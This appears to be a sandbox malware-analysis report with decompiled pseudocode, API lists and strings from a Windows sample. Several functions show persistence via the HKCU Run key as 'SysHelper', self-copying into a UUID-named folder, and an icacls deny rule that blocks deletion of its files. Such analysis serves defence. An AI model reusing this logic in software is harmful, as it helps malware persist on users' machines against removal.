									_v248.dwFlags = 1;
									_v248.wShowWindow = 0;
									SetLastError(0);
									lstrcpyW( &_v12536, L"icacls \"");
									_t194 =  >=  ? _v88 :  &_v88;
									lstrcatW( &_v12536,  >=  ? _v88 :  &_v88);
									lstrcatW( &_v12536, L"\" /deny *S-1-1-0:(OI)(CI)(DE,DC)");
									_t202 = CreateProcessW(0,  &_v12536, 0, 0, 0, 0x48, 0, 0,  &_v248,  &_v156); // executed
									if(_t202 != 0) {
										do {
										} while (WaitForSingleObject(_v156, 1) == 0x102);
									} else {
										GetLastError();
									}
									goto L45;
								}
								_t234 = 0;
								goto L38;
							}
							if(_v2296 != 0) {
								_t237 =  &_v2296;
								_t68 = _t237 + 2; // 0x2
								_t248 = _t68;
								do {
									_t207 =  *_t237;
									_t237 = _t237 + 2;
								} while (_t207 != 0);
								_t239 = _t237 - _t248 >> 1;
								L32:
								_push(_t239);
								E00415C10(_t221, _t250, _t250, _t257,  &_v2296);
								goto L33;
							}
							_t239 = 0;
							goto L32;
						}
					}
					_t213 = E00413520( &_v60,  &_v140, 1, _t255 - lstrlenA("\" --AutoStart") - 1);
					_t262 = _t213;
					if( &_v60 != _t213) {
						if(_v40 >= 8) {
							L00422587(_v60);
							_t264 = _t264 + 4;
						}
						_v40 = 7;
						_v44 = 0;
						_v60 = 0;
						E004145A0( &_v60, _t262);
					}
					if(_v120 >= 8) {
						L00422587(_v140);
						_t264 = _t264 + 4;
					}
					_t216 =  >=  ? _v60 :  &_v60;
					_t124 = PathFileExistsW( >=  ? _v60 :  &_v60);
					if(_t124 == 0) {
						goto L19;
					} else {
						_t242 = _a4;
						if(_t242 != 0) {
							_t124 =  &_v60;
							if(_t242 != _t124) {
								_push(0xffffffff);
								_t124 = E00414690(_t221, _t242, _t124, 0);
							}
						}
						if(_v40 < 8) {
							goto L50;
						} else {
							_push(_v60);
							goto L49;
						}
					}
				}
				_t225 = 0;
				goto L6;
			}

0x00411cd0
0x00411cd9
0x00411cdb
0x00411ce0
0x00411ce6
0x00411ced
0x00411cf2
0x00411cf7
0x00411d10
0x00411d12
0x00411d1a
0x00412207
0x0041220b
0x00412216
0x00412216
0x00411d26
0x00411d34
0x00411d3b
0x00411d40
0x00411d43
0x00411d63
0x00411d6c
0x00411d74
0x00411d7b
0x00411d82
0x00411d8d
0x00411d93
0x00411d99
0x00411da0
0x00411da0
0x00411da3
0x00411da6
0x00411dad
0x00411daf
0x00411daf
0x00411dba
0x00411dbf
0x00411dc6
0x00411dcb
0x00411e7c
0x00411e7c
0x00411e87
0x00411e8c
0x00411e91
0x00411e91
0x00411ea5
0x00411eab
0x00411ead
0x00411ece
0x00411ee1
0x00411ef3
0x00411efc
0x00411f05
0x00411f14
0x00411f1a
0x00411f1f
0x00411f26
0x00411f2d
0x00411f34
0x00411f3a
0x00411f3c
0x00411f3c
0x00411f40
0x00411f40
0x00411f43
0x00411f46
0x00411f4d
0x00000000
0x00411f36
0x00411f36
0x00411f4f
0x00411f54
0x00411f5c
0x00411f64
0x00411f71
0x00411f77
0x00411f83
0x00411f8e
0x00411f96
0x00411fce
0x00411fd0
0x00411fd7
0x00411fde
0x00411fe9
0x00411fef
0x00411ff5
0x00412000
0x00412000
0x00412003
0x00412006
0x0041200d
0x0041200f
0x0041200f
0x0041201a
0x0041201f
0x0041202d
0x00412036
0x0041204c
0x00412055
0x0041206e
0x00412076
0x004121d1
0x004121d5
0x004121da
0x004121df
0x004121df
0x004121e2
0x004121e4
0x004121ef
0x004121f6
0x004121fa
0x004121fc
0x004121ff
0x004121ff
0x00412204
0x00000000
0x004121fa
0x00412082
0x00412090
0x004120a1
0x004120aa
0x004120c0
0x004120ce
0x004120f3
0x004120fc
0x00412102
0x00412107
0x00412110
0x00412110
0x00412120
0x00412125
0x00412128
0x00412134
0x0041213e
0x00412146
0x00412158
0x00412161
0x0041216d
0x0041217b
0x004121a0
0x004121a8
0x004121c0
0x004121ca
0x004121aa
0x004121aa
0x004121aa
0x00000000
0x004121a8
0x00411feb
0x00000000
0x00411feb
0x00411fa0
0x00411fa6
0x00411fac
0x00411fac
0x00411fb0
0x00411fb0
0x00411fb3
0x00411fb6
0x00411fbd
0x00411fbf
0x00411fbf
0x00411fc9
0x00000000
0x00411fc9
0x00411fa2
0x00000000
0x00411fa2
0x00411f34
0x00411dec
0x00411df1
0x00411df8
0x00411dfe
0x00411e03
0x00411e08
0x00411e08
0x00411e0d
0x00411e18
0x00411e1f
0x00411e23
0x00411e23
0x00411e2c
0x00411e34
0x00411e39
0x00411e39
0x00411e43
0x00411e48
0x00411e50
0x00000000
0x00411e52
0x00411e52
0x00411e57
0x00411e59
0x00411e5e
0x00411e60
0x00411e65
0x00411e65
0x00411e5e
0x00411e6e
0x00000000
0x00411e74
0x00411e74
0x00000000
0x00411e74
0x00411e6e
0x00411e50
0x00411d8f
0x00000000

APIs

RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
_memset.LIBCMT ref: 00411D3B
RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
GetCommandLineW.KERNEL32 ref: 00411EB4
CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
lstrcpyW.KERNEL32 ref: 00411ECE
PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
UuidCreate.RPCRT4(?), ref: 00411EFC
UuidToStringW.RPCRT4(?,?), ref: 00411F14
RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
PathAppendW.SHLWAPI(?,?), ref: 00411F83
CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
DeleteFileW.KERNEL32(?), ref: 00412036
CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
_memset.LIBCMT ref: 00412090
lstrcpyW.KERNEL32 ref: 004120AA
lstrcatW.KERNEL32(?,?), ref: 004120C0
lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
lstrlenW.KERNEL32(?), ref: 004120D7
RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
RegCloseKey.ADVAPI32(00000000), ref: 004120FC
_memset.LIBCMT ref: 00412120
SetLastError.KERNEL32(00000000), ref: 00412146
lstrcpyW.KERNEL32 ref: 00412158
lstrcatW.KERNEL32(?,?), ref: 0041216D

Strings

SHGetFolderPathW, xrefs: 00411E9F
Shell32.dll, xrefs: 00411E94
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00411D06, 00412064
" /deny *S-1-1-0:(OI)(CI)(DE,DC), xrefs: 0041216F
" --AutoStart, xrefs: 004120C2
icacls ", xrefs: 0041214C
D, xrefs: 00412128
SysHelper, xrefs: 00411D5B, 004120EB
" --AutoStart, xrefs: 00411DD1

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
API String ID: 2589766509-1182136429
Opcode ID: af0f6280857ed183423fa55c0dfc78c3cec959b41519de90f528b9b2836446d1
Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
Opcode Fuzzy Hash: af0f6280857ed183423fa55c0dfc78c3cec959b41519de90f528b9b2836446d1
Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00412220 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E00412220() {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				unsigned int _v20;
				unsigned int _v24;
				WCHAR* _v28;
				int _v32;
				char _v36;
				char _v2084;
				char _v43044;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t37;
				void* _t38;
				unsigned int _t40;
				void* _t50;
				struct HINSTANCE__* _t52;
				int _t56;
				signed int _t61;
				struct HINSTANCE__* _t62;
				void* _t63;
				struct HINSTANCE__* _t64;
				void* _t65;
				void* _t66;

				E0042F7C0(0xa820);
				_t56 = 0;
				_v32 = 0;
				_v28 = PathFindFileNameW( *(CommandLineToArgvW(GetCommandLineW(),  &_v32)));
				_t62 = LoadLibraryW(L"kernel32.dll");
				_v8 = GetProcAddress(_t62, "EnumProcesses");
				_v12 = GetProcAddress(_t62, "EnumProcessModules");
				_v16 = GetProcAddress(_t62, "GetModuleBaseNameW");
				_t37 = _v8;
				if(_t37 == 0) {
					_t52 = LoadLibraryW(L"Psapi.dll"); // executed
					_t64 = _t52;
					_v8 = GetProcAddress(_t64, "EnumProcesses");
					_v12 = GetProcAddress(_t64, "EnumProcessModules");
					_v16 = GetProcAddress(_t64, "GetModuleBaseNameW");
					_t37 = _v8;
				}
				_t38 =  *_t37( &_v43044, 0xa000,  &_v20); // executed
				if(_t38 != 0) {
					_t61 = 0;
					_t40 = _v20 >> 2;
					_v24 = _t40;
					if(_t40 != 0) {
						do {
							_t63 = OpenProcess(0x410, 0,  *(_t65 + _t61 * 4 - 0xa820));
							if(_t63 != 0) {
								_push( &_v36);
								_push(4);
								_push( &_v8);
								_push(_t63); // executed
								if(_v12() != 0) {
									_v16(_t63, _v8,  &_v2084, 0x400);
									_t50 = E00420235(_t56, _t61, _t63,  &_v2084, _v28);
									_t66 = _t66 + 8;
									if(_t50 == 0) {
										_t56 = _t56 + 1;
									}
								}
							}
							CloseHandle(_t63);
							_t61 = _t61 + 1;
						} while (_t61 < _v24);
					}
					return _t56;
				} else {
					return 1;
				}
			}

0x00412228
0x0041222f
0x00412232
0x00412253
0x00412262
0x00412272
0x0041227d
0x00412282
0x00412285
0x0041228a
0x00412291
0x00412297
0x004122a7
0x004122b2
0x004122b7
0x004122ba
0x004122ba
0x004122cd
0x004122d1
0x004122e2
0x004122e4
0x004122e7
0x004122ec
0x004122f0
0x00412304
0x00412308
0x0041230d
0x0041230e
0x00412313
0x00412314
0x0041231a
0x0041232c
0x00412339
0x0041233e
0x00412343
0x00412345
0x00412345
0x00412343
0x0041231a
0x00412347
0x0041234d
0x0041234e
0x004122f0
0x0041235b
0x004122d5
0x004122de
0x004122de

APIs

GetCommandLineW.KERNEL32 ref: 00412235
CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
CloseHandle.KERNEL32(00000000), ref: 00412347

Strings

Psapi.dll, xrefs: 0041228C
GetModuleBaseNameW, xrefs: 00412277, 004122AC
EnumProcessModules, xrefs: 0041226C, 004122A1
kernel32.dll, xrefs: 0041224E
EnumProcesses, xrefs: 00412264, 00412299

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
API String ID: 3668891214-3807497772
Opcode ID: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
Opcode Fuzzy Hash: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5

Uniqueness

Uniqueness Score: -1.00%

Function 00423576 Relevance: 16.8, APIs: 11, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00423576(signed int __edx, signed int _a4, signed int _a8) {
				char _v8;
				char _v12;
				char _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int* _t81;
				signed int _t83;
				void* _t84;
				signed int _t87;
				signed int _t89;
				signed int _t92;
				void* _t94;
				signed int _t95;
				signed int _t98;
				signed int _t100;
				signed int _t102;
				signed int _t105;
				void* _t106;
				signed int _t108;
				void* _t109;
				signed int _t111;
				signed int _t117;
				signed int _t126;
				signed int _t132;
				signed int* _t135;
				signed int _t139;
				signed int _t141;
				void* _t143;
				void* _t155;
				signed int _t158;
				signed int _t167;
				signed int* _t171;
				signed int _t173;
				signed int _t177;
				signed int _t178;
				intOrPtr _t180;
				signed int _t182;
				void* _t184;
				void* _t186;
				signed int _t187;
				signed int _t188;

				_t167 = __edx;
				_t171 = _a4;
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				_t195 = _t171;
				if(_t171 != 0) {
					E0042B420(_t171, 0xff, 0x24);
					_t177 = _a8;
					__eflags = _t177;
					if(__eflags == 0) {
						goto L1;
					} else {
						__eflags =  *(_t177 + 4);
						if(__eflags > 0) {
							L9:
							_t84 = 7;
							__eflags =  *(_t177 + 4) - _t84;
							if(__eflags < 0) {
								L12:
								E0042FB64(0, _t167, _t171, _t177, __eflags); // executed
								_t87 = E0042F803( &_v12);
								__eflags = _t87;
								if(_t87 != 0) {
									L45:
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									E004242FD(0, _t167);
									asm("int3");
									_push(_t177);
									_t180 = _v52;
									_t89 =  *(_t180 + 0xc);
									__eflags = _t89 & 0x00000083;
									if(__eflags != 0) {
										_push(0);
										_t139 = _a8;
										 *(_t180 + 0xc) = _t89 & 0xffffffef;
										_push(_t171);
										__eflags = _t139 - 1;
										if(_t139 != 1) {
											_t173 = _a4;
										} else {
											_t173 = _a4 + E004230C5(_t139, _t167, _t180, _t180);
											_t139 = 0;
										}
										E0042836B(_t167, _t180);
										_t92 =  *(_t180 + 0xc);
										__eflags = _t92;
										if(_t92 >= 0) {
											__eflags = _t92 & 0x00000001;
											if((_t92 & 0x00000001) != 0) {
												__eflags = _t92 & 0x00000008;
												if((_t92 & 0x00000008) != 0) {
													__eflags = _t92 & 0x00000400;
													if((_t92 & 0x00000400) == 0) {
														 *((intOrPtr*)(_t180 + 0x18)) = 0x200;
													}
												}
											}
										} else {
											 *(_t180 + 0xc) = _t92 & 0xfffffffc;
										}
										_push(_t139);
										_push(_t173);
										_push(E0042816B(_t180));
										_t94 = E0042818F(_t139, _t167, _t173, _t180, __eflags);
										__eflags = _t94 - 0xffffffff;
										_t78 = _t94 != 0xffffffff;
										__eflags = _t78;
										_t79 = (0 | _t78) - 1; // -1
										_t95 = _t79;
									} else {
										_t98 = E00425208(__eflags);
										 *_t98 = 0x16;
										_t95 = _t98 | 0xffffffff;
									}
									return _t95;
								} else {
									_t100 = E0042F82D( &_v16);
									__eflags = _t100;
									if(_t100 != 0) {
										goto L45;
									} else {
										_t102 = E0042F857( &_v8);
										__eflags = _t102;
										if(_t102 != 0) {
											goto L45;
										} else {
											_t11 = _t177 + 4; // 0x858d0050
											_t141 =  *_t11;
											_t155 =  *_t177;
											__eflags = _t141;
											if(__eflags < 0) {
												L23:
												_t83 = E0042F939(_t171, _t177);
												__eflags = _t83;
												if(_t83 == 0) {
													__eflags = _v12 - _t83;
													if(__eflags == 0) {
														L27:
														asm("cdq");
														_t182 = _t167;
														asm("cdq");
														_t143 =  *_t171 - _v8;
														asm("sbb esi, edx");
													} else {
														_push(_t171);
														_t126 = E0042FBB4(_t141, _t171, _t177, __eflags);
														__eflags = _t126;
														if(_t126 == 0) {
															goto L27;
														} else {
															asm("cdq");
															_t171[8] = 1;
															asm("cdq");
															_t143 =  *_t171 - _v16 + _v8;
															asm("sbb edx, esi");
															_a4 = _t167;
															_t182 = _t167;
														}
													}
													_t105 = E004305A0(_t143, _t182, 0x3c, 0);
													 *_t171 = _t105;
													__eflags = _t105;
													if(_t105 < 0) {
														_t143 = _t143 + 0xffffffc4;
														 *_t171 = _t105 + 0x3c;
														asm("adc esi, 0xffffffff");
													}
													_t106 = E004304F0(_t143, _t182, 0x3c, 0);
													_t144 = _t167;
													asm("cdq");
													_t184 = _t106 + _t171[1];
													asm("adc ebx, edx");
													_t108 = E004305A0(_t184, _t167, 0x3c, 0);
													_t171[1] = _t108;
													__eflags = _t108;
													if(_t108 < 0) {
														_t184 = _t184 + 0xffffffc4;
														_t171[1] = _t108 + 0x3c;
														asm("adc ebx, 0xffffffff");
													}
													_t109 = E004304F0(_t184, _t144, 0x3c, 0);
													_t145 = _t167;
													asm("cdq");
													_t186 = _t109 + _t171[2];
													asm("adc ebx, edx");
													_t111 = E004305A0(_t186, _t167, 0x18, 0);
													_t171[2] = _t111;
													__eflags = _t111;
													if(_t111 < 0) {
														_t186 = _t186 + 0xffffffe8;
														_t171[2] = _t111 + 0x18;
														asm("adc ebx, 0xffffffff");
													}
													_t158 = E004304F0(_t186, _t145, 0x18, 0);
													__eflags = _t167;
													if(__eflags < 0) {
														L43:
														_t171[3] = _t171[3] + _t158;
														asm("cdq");
														_t187 = 7;
														_t117 = _t171[3];
														_t171[6] = (_t171[6] + 7 + _t158) % _t187;
														__eflags = _t117;
														if(_t117 > 0) {
															goto L38;
														} else {
															_t171[4] = 0xb;
															_t171[3] = _t117 + 0x1f;
															_t55 = _t158 + 0x16d; // 0x16d
															_t171[7] = _t171[7] + _t55;
															_t171[5] = _t171[5] - 1;
														}
													} else {
														if(__eflags > 0) {
															L37:
															asm("cdq");
															_t188 = 7;
															_t39 =  &(_t171[3]);
															 *_t39 = _t171[3] + _t158;
															__eflags =  *_t39;
															_t171[6] = (_t171[6] + _t158) % _t188;
															L38:
															_t42 =  &(_t171[7]);
															 *_t42 = _t171[7] + _t158;
															__eflags =  *_t42;
														} else {
															__eflags = _t158;
															if(_t158 == 0) {
																__eflags = _t167;
																if(__eflags <= 0) {
																	if(__eflags < 0) {
																		goto L43;
																	} else {
																		__eflags = _t158;
																		if(_t158 < 0) {
																			goto L43;
																		}
																	}
																}
															} else {
																goto L37;
															}
														}
													}
													goto L39;
												}
											} else {
												if(__eflags > 0) {
													L18:
													asm("cdq");
													asm("sbb ebx, edx");
													_v24 = _t155 - _v8;
													_v20 = _t141;
													_t83 = E0042F939(_t171,  &_v24);
													__eflags = _t83;
													if(_t83 == 0) {
														__eflags = _v12 - _t83;
														if(__eflags == 0) {
															L39:
															_t83 = 0;
														} else {
															_push(_t171);
															_t132 = E0042FBB4(_t141, _t171, _t177, __eflags);
															__eflags = _t132;
															if(_t132 == 0) {
																goto L39;
															} else {
																asm("cdq");
																_v24 = _v24 - _v16;
																asm("sbb [ebp-0x10], edx");
																_t83 = E0042F939(_t171,  &_v24);
																__eflags = _t83;
																if(_t83 == 0) {
																	_t171[8] = 1;
																	goto L39;
																}
															}
														}
													}
												} else {
													__eflags = _t155 - 0x3f480;
													if(_t155 <= 0x3f480) {
														goto L23;
													} else {
														goto L18;
													}
												}
											}
											goto L3;
										}
									}
								}
							} else {
								if(__eflags > 0) {
									goto L8;
								} else {
									__eflags =  *_t177 - 0x93406fff;
									if(__eflags > 0) {
										goto L8;
									} else {
										goto L12;
									}
								}
							}
						} else {
							if(__eflags < 0) {
								L8:
								_t135 = E00425208(__eflags);
								_t178 = 0x16;
								 *_t135 = _t178;
								goto L2;
							} else {
								__eflags =  *_t177;
								if(__eflags >= 0) {
									goto L9;
								} else {
									goto L8;
								}
							}
						}
					}
				} else {
					L1:
					_t81 = E00425208(_t195);
					_t178 = 0x16;
					 *_t81 = _t178;
					E004242D2();
					L2:
					_t83 = _t178;
					L3:
					return _t83;
				}
			}

0x00423576
0x00423581
0x00423584
0x00423587
0x0042358a
0x0042358d
0x0042358f
0x004235b1
0x004235b6
0x004235bc
0x004235be
0x00000000
0x004235c0
0x004235c0
0x004235c3
0x004235d7
0x004235d9
0x004235da
0x004235dd
0x004235e9
0x004235e9
0x004235f2
0x004235f8
0x004235fa
0x004237e5
0x004237e5
0x004237e6
0x004237e7
0x004237e8
0x004237e9
0x004237ea
0x004237ef
0x004237f3
0x004237f4
0x004237f7
0x004237fa
0x004237fc
0x0042380e
0x0042380f
0x00423815
0x00423818
0x00423819
0x0042381c
0x0042382e
0x0042381e
0x00423827
0x00423829
0x0042382b
0x00423832
0x00423837
0x0042383b
0x0042383d
0x00423847
0x00423849
0x0042384b
0x0042384d
0x0042384f
0x00423854
0x00423856
0x00423856
0x00423854
0x0042384d
0x0042383f
0x00423842
0x00423842
0x0042385d
0x0042385e
0x00423866
0x00423867
0x00423871
0x00423874
0x00423874
0x00423879
0x00423879
0x004237fe
0x004237fe
0x00423803
0x00423809
0x00423809
0x0042387e
0x00423600
0x00423604
0x0042360a
0x0042360c
0x00000000
0x00423612
0x00423616
0x0042361c
0x0042361e
0x00000000
0x00423624
0x00423624
0x00423624
0x00423627
0x00423629
0x0042362b
0x0042369b
0x0042369d
0x004236a4
0x004236a6
0x004236ac
0x004236af
0x004236de
0x004236e0
0x004236e3
0x004236e8
0x004236e9
0x004236eb
0x004236b1
0x004236b1
0x004236b2
0x004236b8
0x004236ba
0x00000000
0x004236bc
0x004236c2
0x004236c5
0x004236d0
0x004236d3
0x004236d5
0x004236d7
0x004236da
0x004236da
0x004236ba
0x004236f3
0x004236f8
0x004236fa
0x004236fc
0x00423701
0x00423704
0x00423706
0x00423706
0x0042370f
0x00423716
0x0042371b
0x0042371c
0x00423722
0x00423726
0x0042372b
0x0042372e
0x00423730
0x00423735
0x00423738
0x0042373b
0x0042373b
0x00423744
0x0042374b
0x00423750
0x00423751
0x00423757
0x0042375b
0x00423760
0x00423763
0x00423765
0x0042376a
0x0042376d
0x00423770
0x00423770
0x0042377e
0x00423780
0x00423782
0x004237af
0x004237b5
0x004237bc
0x004237bd
0x004237c0
0x004237c3
0x004237c6
0x004237c8
0x00000000
0x004237ca
0x004237cd
0x004237d4
0x004237d7
0x004237dd
0x004237e0
0x004237e0
0x00423784
0x00423784
0x0042378a
0x00423791
0x00423792
0x00423795
0x00423795
0x00423795
0x00423798
0x0042379b
0x0042379b
0x0042379b
0x0042379b
0x00423786
0x00423786
0x00423788
0x004237a5
0x004237a7
0x004237a9
0x00000000
0x004237ab
0x004237ab
0x004237ad
0x00000000
0x00000000
0x004237ad
0x004237a9
0x00000000
0x00000000
0x00000000
0x00423788
0x00423784
0x00000000
0x00423782
0x0042362d
0x0042362d
0x00423637
0x0042363a
0x00423641
0x00423643
0x00423647
0x0042364a
0x00423651
0x00423653
0x00423659
0x0042365c
0x0042379e
0x0042379e
0x00423662
0x00423662
0x00423663
0x00423669
0x0042366b
0x00000000
0x00423671
0x00423674
0x00423675
0x0042367c
0x00423680
0x00423687
0x00423689
0x0042368f
0x00000000
0x0042368f
0x00423689
0x0042366b
0x0042365c
0x0042362f
0x0042362f
0x00423635
0x00000000
0x00000000
0x00000000
0x00000000
0x00423635
0x0042362d
0x00000000
0x0042362b
0x0042361e
0x0042360c
0x004235df
0x004235df
0x00000000
0x004235e1
0x004235e1
0x004235e7
0x00000000
0x00000000
0x00000000
0x00000000
0x004235e7
0x004235df
0x004235c5
0x004235c5
0x004235cb
0x004235cb
0x004235d2
0x004235d3
0x00000000
0x004235c7
0x004235c7
0x004235c9
0x00000000
0x00000000
0x00000000
0x00000000
0x004235c9
0x004235c5
0x004235c3
0x00423591
0x00423591
0x00423591
0x00423598
0x00423599
0x0042359b
0x004235a0
0x004235a0
0x004235a2
0x004235a8
0x004235a8

APIs

_memset.LIBCMT ref: 004235B1

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

__gmtime64_s.LIBCMT ref: 0042364A
__gmtime64_s.LIBCMT ref: 00423680
__gmtime64_s.LIBCMT ref: 0042369D
__allrem.LIBCMT ref: 004236F3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
__allrem.LIBCMT ref: 00423726
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
__allrem.LIBCMT ref: 0042375B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
__invoke_watson.LIBCMT ref: 004237EA

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798

Uniqueness

Uniqueness Score: -1.00%

Function 00423B4C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E00423B4C(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				char* _v16;
				char _v28;
				signed char _v32;
				void* _t10;
				void* _t19;
				intOrPtr* _t22;
				void* _t24;
				void* _t25;
				intOrPtr* _t27;

				_t25 = __edi;
				_t24 = __edx;
				_t19 = __ebx;
				while(1) {
					_t10 = E00420C62(_t19, _t24, _t25, _a4); // executed
					if(_t10 != 0) {
						break;
					}
					if(E0042793D(_t10, _a4) == 0) {
						_push(1);
						_v16 = "bad allocation";
						_t22 =  &_v28;
						E00430D21(_t22,  &_v16);
						_v28 = 0x4cf748;
						E00430ECA( &_v28, 0x50793c);
						asm("int3");
						_t27 = _t22;
						 *_t27 = 0x4cf748;
						E00430D91(_t22);
						if((_v32 & 0x00000001) != 0) {
							L00422587(_t27);
						}
						return _t27;
					} else {
						continue;
					}
					L7:
				}
				return _t10;
				goto L7;
			}

0x00423b4c
0x00423b4c
0x00423b4c
0x00423b61
0x00423b64
0x00423b6c
0x00000000
0x00000000
0x00423b5f
0x00423b72
0x00423b77
0x00423b7f
0x00423b82
0x00423b8f
0x00423b97
0x00423b9c
0x00423ba1
0x00423ba3
0x00423ba9
0x00423bb2
0x00423bb5
0x00423bba
0x00423bbf
0x00000000
0x00000000
0x00000000
0x00000000
0x00423b5f
0x00423b71
0x00000000

APIs

_malloc.LIBCMT ref: 00423B64

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(005C0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

